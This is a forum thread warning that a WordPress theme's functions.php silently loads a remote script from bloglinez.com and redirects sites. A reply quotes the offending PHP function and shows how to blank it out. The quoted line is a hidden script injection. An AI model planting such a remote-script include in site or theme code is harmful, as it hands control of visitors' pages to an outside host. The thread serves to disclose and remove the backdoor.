Membership is FREE – with unlimited access to all features, tools, and discussions. Premium accounts get benefits like banner ads and newsletter exposure. ✅ Signature links are now free for all. 🚫 No AI-generated (LLM) posts allowed. Share your own thoughts and experience — accounts may be terminated for violations.

WP hotgoss-theme 2.0

Status
Not open for further replies.
Joined
May 20, 2005
Posts
1,197
Reaction score
6
if anyone is using the wordpress hotgoss-theme 2.0 then you need to check your sites.

there is something in the functions.php file that is now making sites redirect to bloglinez.com

if you need to fix it PM me and i will tell you what to do to fix.
 
Solution

This cropped up on a friends website yesterday and I had to sort it for them.

Apparently the file was always in the functions.php file and was just sitting there until someone decided to make the js do something.

I'm guessing this code is in quite a few wordpress themes as they were using the 'Playmaker' theme.

The solution to this is here on the Wordpress forums.

Replace:
Code:
function mt_misc_header() {
	echo '<script src="http://www.bloglinez.com/theme.js" type="text/javascript"></script>';
}

with:
Code:
function mt_misc_header() {
	echo '';
}

and that should fix it.
 
Status
Not open for further replies.

Rule #1: Be Respectful

Do not insult any other member. Be polite and do business. Thank you!

Premium Members

New Threads

Domain Forum Friends

Lastest Listings

Our Mods' Businesses

*the exceptional businesses of our esteemed moderators
General chit-chat
Help Users
  • No one is chatting at the moment.
  • Siusaidh AcornBot:
    Siusaidh has left the room.
      Siusaidh AcornBot: Siusaidh has left the room.
      Top Bottom